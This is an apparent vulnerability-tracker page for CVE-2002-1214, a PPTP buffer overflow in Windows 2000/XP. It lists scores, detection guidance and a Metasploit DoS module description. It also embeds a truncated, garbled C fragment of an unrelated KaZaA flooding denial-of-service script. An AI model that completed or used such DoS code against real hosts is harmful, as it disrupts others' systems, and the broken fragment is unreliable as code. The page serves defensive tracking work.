CVE-2002-1214
published 2002-10-28CVE-2002-1214: Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
50.65%
98.8th percentile
Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data.
Detection & IOCsextracted from sources · hover to see the quote
- →Detect malformed PPTP control data packets targeting Windows PPTP RAS servers (TCP/1723); abnormal PPTP Control Data packets can trigger a kernel buffer overflow resulting in BSOD. ↗
- →Monitor for unexpected system hangs or BSODs on Windows 2000/XP hosts running PPTP RAS services following inbound PPTP connections. ↗
- ·Affected platforms are limited to Windows 2000 SP0–SP3 and Windows XP SP0–SP1 running PPTP Remote Access Services; patched or later service-pack systems are not affected. ↗
- ·The Metasploit module is auxiliary/DoS only; while arbitrary code execution may be theoretically possible, it has not been demonstrated by this module. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
KaZaA Media Desktop 1.7.1 - Large Message Denial of Service
exploitdb·2002-07-25
CVE-2002-2306 KaZaA Media Desktop 1.7.1 - Large Message Denial of Service
KaZaA Media Desktop 1.7.1 - Large Message Denial of Service
---
// source: https://www.securityfocus.com/bid/5317/info
KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition.
/*
kazaa denial of service attack
by Josh and omega
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 1214
int main(int argc, char *argv[])
{
int fd, numbytes, randnum, k;
struct hostent *host;
struct sockaddr_in them;
char buf2[4026];
char buf[5000];
char *bigboy;
int i, size, j;
memset(buf2, 'a', sizeof(buf2));
buf2[sizeof(buf2)-1]='\0';
srand(time(NULL));
if (argc \n", argv[0]);
exit(1)
Metasploit
MS02-063 PPTP Malformed Control Data Kernel Denial of Service
metasploit
MS02-063 PPTP Malformed Control Data Kernel Denial of Service
MS02-063 PPTP Malformed Control Data Kernel Denial of Service
This module exploits a kernel based overflow when sending abnormal PPTP Control Data packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers (Remote Access Services). Kernel memory is overwritten resulting in a BSOD. Code execution may be possible however this module is only a DoS.
No writeups or analysis indexed.
http://online.securityfocus.com/archive/1/293146http://www.iss.net/security_center/static/10199.phphttp://www.securityfocus.com/bid/5807https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-063http://online.securityfocus.com/archive/1/293146http://www.iss.net/security_center/static/10199.phphttp://www.securityfocus.com/bid/5807https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-063
2002-10-28
Published